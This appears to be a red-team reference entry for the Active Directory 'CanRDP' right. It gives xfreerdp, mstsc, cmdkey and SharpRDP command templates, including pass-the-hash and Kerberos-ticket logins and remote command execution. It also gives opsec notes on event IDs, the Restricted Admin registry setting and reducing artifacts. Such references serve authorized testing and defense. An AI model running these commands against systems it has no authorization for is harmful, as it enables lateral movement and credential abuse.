CanRDP
Principal has the right to Remote Desktop (RDP) login to the target computer.
Applies to: User/Group β Computer
Linux Abuse
xfreerdp (password)
xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target> /dynamic-resolution
xfreerdp (pass-the-hash)
xfreerdp /u:<username> /pth:<ntlm-hash> /d:<domain> /v:<target> /dynamic-resolution
xfreerdp (Kerberos ccache)
KRB5CCNAME=<ccache> xfreerdp /u:<username> /d:<domain> /v:<target> /sec:kerberos /dynamic-resolution
Windows Abuse
mstsc (interactive)
mstsc /v:<target>
PowerShell (cmdkey + mstsc)
cmdkey /generic:<target> /user:<domain>\<username> /pass:<password>
mstsc /v:<target>
SharpRDP (remote exec via RDP without GUI)
SharpRDP.exe computername=<target> command="calc.exe" username=<domain>\<username> password=<password>
Opsec
- RDP logins generate Event ID 4624 (logon type 10) and 4778/4779 on target
- Pass-the-hash via xfreerdp requires Restricted Admin mode enabled on target (
HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0) - SharpRDP leaves fewer GUI artifacts than interactive mstsc session